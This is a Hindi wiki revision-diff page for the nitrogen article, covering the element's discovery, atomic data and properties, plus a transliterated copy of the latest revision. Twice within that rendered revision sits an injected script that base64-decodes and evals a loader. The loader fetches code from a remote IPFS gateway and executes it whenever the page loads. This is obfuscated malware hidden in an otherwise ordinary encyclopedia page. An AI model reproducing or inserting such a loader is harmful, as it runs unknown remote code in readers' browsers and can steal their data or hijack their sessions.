Difference between revisions of "नाइट्रोजन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{Elementbox |name=नाइट्रोजन |symbol=N |number=7 |pronounce= |left=कार्बन |right=[[ऑक्सीज...' के साथ नया पन्ना बनाया)
 
 
(12 intermediate revisions by 4 users not shown)
Line 1: Line 1:
{{Elementbox
+
{{सूचना बक्सा नाइट्रोजन}}
|name=नाइट्रोजन
+
'''नाइट्रोजन''' ([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:''Nitrogen'') नाइट्रोजन गैस की खोज रदरफोर्ड ने 1773 में की थी। नाइट्रोजन [[आवर्त सारणी]] का सातवाँ [[तत्व]] है। इसका प्रतीक चिह्न 'N' है। इसका [[परमाणु द्रव्यमान]] 14.0067 होता है। इसका [[इलेक्ट्रॉनिक विन्यास]] 1s<sup>2</sup>, 2s<sup>2</sup>, 2p<sup>3</sup> होता है। इसे आवर्त सारणी के उपवर्ग 5A में रखा गया है।  
|symbol=N
 
|number=7
 
|pronounce=
 
|left=[[कार्बन]]
 
|right=[[ऑक्सीजन]]
 
|above=-
 
|below=[[फास्फोरस|P]]
 
|series=अधातु
 
|series comment=
 
|group=15
 
|period=2
 
|block=p
 
|series color=
 
|phase color=
 
|appearance=रंगहीन गैस, द्रव या ठोस
 
|image name=Liquid-Nitrogen.jpg
 
|image size=
 
|image name comment=
 
|image name 2=Nitrogen-Spectra.jpg
 
|image size 2=
 
|image name 2 comment=नाइट्रोजन की वर्णक्रम रेखाएँ
 
|atomic mass=14.0067
 
|atomic mass 2=2
 
|atomic mass comment=
 
|electron configuration=1s<sup>2</sup> 2s<sup>2</sup> 2p<sup>3</sup>
 
|electrons per shell=2, 5
 
|color=रंगहीन
 
|phase=गैस
 
|phase comment=
 
|density gplstp=1.251
 
|density gpcm3nrt=
 
|density gpcm3nrt 3=
 
|density gpcm3mp=
 
|density gpcm3bp=0.808
 
|melting point K=63.153
 
|melting point C=-210.00
 
|melting point F=-346.00
 
|melting point pressure=
 
|sublimation point K=
 
|sublimation point C=
 
|sublimation point F=
 
|sublimation point pressure=
 
|boiling point K=77.36
 
|boiling point C=-195.79
 
|boiling point F=-320.3342
 
|boiling point pressure=
 
|triple point K=63.1526
 
|triple point kPa=12.53
 
|triple point K 2=
 
|triple point kPa 2=
 
|critical point K=126.19
 
|critical point MPa=3.3978
 
|heat fusion=(N<sub>2</sub>) 0.72
 
|heat fusion 2=
 
|heat fusion pressure=
 
|heat vaporization=(N<sub>2</sub>) 5.56
 
|heat vaporization pressure=
 
|heat capacity=(N<sub>2</sub>) 29.124
 
|heat capacity pressure=
 
|vapor pressure 1=37
 
|vapor pressure 10=41
 
|vapor pressure 100=46
 
|vapor pressure 1 k=53
 
|vapor pressure 10 k=62
 
|vapor pressure 100 k=77
 
|vapor pressure comment=
 
|crystal structure=षटकोणीय
 
|oxidation states=5, 4, 3, 2, 1, -1, -2, -3
 
|oxidation states comment=अम्लीय आक्साइड
 
|electronegativity=3.04
 
|number of ionization energies=3
 
|1st ionization energy=1402.3
 
|2nd ionization energy=2856
 
|3rd ionization energy=4578.1
 
|atomic radius=
 
|atomic radius calculated=
 
|covalent radius=71±1
 
|Van der Waals radius=155
 
|magnetic ordering= प्रतिचुम्बकीय
 
|electrical resistivity=
 
|electrical resistivity at 0=
 
|electrical resistivity at 20=
 
|thermal conductivity=(300 K) 25.83x10−3
 
|thermal conductivity 2=
 
|thermal diffusivity=
 
|thermal expansion=
 
|thermal expansion at 25=
 
|speed of sound=(गैस, 27 °C) 353
 
|speed of sound rod at 20=
 
|speed of sound rod at r.t.=
 
|Tensile strength=
 
|Young's modulus=
 
|Shear modulus=
 
|Bulk modulus=
 
|Poisson ratio=
 
|Mohs hardness=
 
|Vickers hardness=
 
|Brinell hardness=
 
|CAS number=7727-37-9
 
|isotopes=
 
{{Elementbox_isotopes_decay | mn=13 | sym=N
 
| na=[[synthetic radioisotope|syn]] | hl=9.965 min
 
| dm=ε | de=2.220 | pn=13 | ps=C }}
 
{{Elementbox_isotopes_stable | mn=14 | sym=N | na=99.634% | n=7 }}
 
{{Elementbox_isotopes_stable | mn=15 | sym=N | na=0.366% | n=8 }}
 
}}
 
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Nitrogen) नाइट्रोजन गैस की खोज रदरफोर्ड ने 1773 में की थी। नाइट्रोजन [[आवर्त सारणी]] का सातवाँ [[तत्व]] है। इसका प्रतीकानुसार '<math>\mathbf{N}</math>' है। इसका [[परमाणु द्रव्यमान]] 14.0067 होता है। इसका इलेक्ट्रॉनिक विन्यास <math>\mathbf{1}</math><math>\mathbf{s}</math><sup>2</sup> <math>\mathbf{2}</math><math>\mathbf{s}</math><sup>2</sup> <math>\mathbf{2}</math><math>\mathbf{p}</math><sup>3</sup> होता है। इसे अवार्त सारणी के उपवर्ग <math>\mathbf{5}</math><math>\mathbf{A}</math> में रखा गया है।  
 
 
==प्रकृति==
 
==प्रकृति==
यह रंगहीन गैस है। वायु में 79 % भाग नाइट्रोजन पाई जाती है। यह गैस जलने में सहायक नहीं है। जलती हुई तीली नाइट्रोजन से भरे जार में ले जाने पर तीली बुझ जाती है। जीव- जन्तुओं व वनस्पतिओं में यह प्रोटीन के रूप में संचित रहती है। यह गैस श्वसन क्रिया में सहायक नहीं है तथा जिससे नाइट्रोजन के वायुमण्डल में प्राणियों की मृत्यु हो सकती है। उद्योगों में इसका प्रयोग नाइट्रिक अम्ल व अमोनिया बनाने में किया जाता है।  
+
यह रंगहीन गैस है। वायु में 79 % भाग नाइट्रोजन पाई जाती है। यह गैस जलने में सहायक नहीं है। जलती हुई तीली नाइट्रोजन से भरे जार में ले जाने पर तीली बुझ जाती है। जीव-जन्तुओं व वनस्पतिओं में यह [[प्रोटीन]] के रूप में संचित रहती है। यह [[गैस]] [[श्वसन]] क्रिया में सहायक नहीं है तथा जिससे नाइट्रोजन के [[वायुमण्डल]] में प्राणियों की मृत्यु हो सकती है। उद्योगों में इसका प्रयोग नाइट्रिक [[अम्ल]] [[अमोनिया]] बनाने में किया जाता है।  
{{लेख प्रगति
+
 
|आधार=
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3|माध्यमिक=|पूर्णता=|शोध=}}
|प्रारम्भिक=प्रारम्भिक2
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
+
==संबंधित लेख==
 +
{{आवर्त सारणी}}{{रसायन विज्ञान}}
 
[[Category:रसायन विज्ञान]]
 
[[Category:रसायन विज्ञान]]
 +
[[Category:रासायनिक तत्त्व]]
 +
[[Category:अधातु]]
 +
[[Category:गैसें]]
 
[[Category:विज्ञान_कोश]]
 
[[Category:विज्ञान_कोश]]
 
__INDEX__
 
__INDEX__
__NOTOC__
 

Latest revision as of 07:11, 17 February 2021

  1. REDIRECTsaancha:Infobox element

naitrojan (aangrezi:Nitrogen) naitrojan gais ki khoj radaraphord ne 1773 mean ki thi. naitrojan avart sarani ka satavaan tatv hai. isaka pratik chihn 'N' hai. isaka paramanu dravyaman 14.0067 hota hai. isaka ilektr aaunik vinyas 1s2, 2s2, 2p3 hota hai. ise avart sarani ke upavarg 5A mean rakha gaya hai.

prakriti

yah rangahin gais hai. vayu mean 79 % bhag naitrojan paee jati hai. yah gais jalane mean sahayak nahian hai. jalati huee tili naitrojan se bhare jar mean le jane par tili bujh jati hai. jiv-jantuoan v vanaspatioan mean yah protin ke roop mean sanchit rahati hai. yah gais shvasan kriya mean sahayak nahian hai tatha jisase naitrojan ke vayumandal mean praniyoan ki mrityu ho sakati hai. udyogoan mean isaka prayog naitrik aml v amoniya banane mean kiya jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>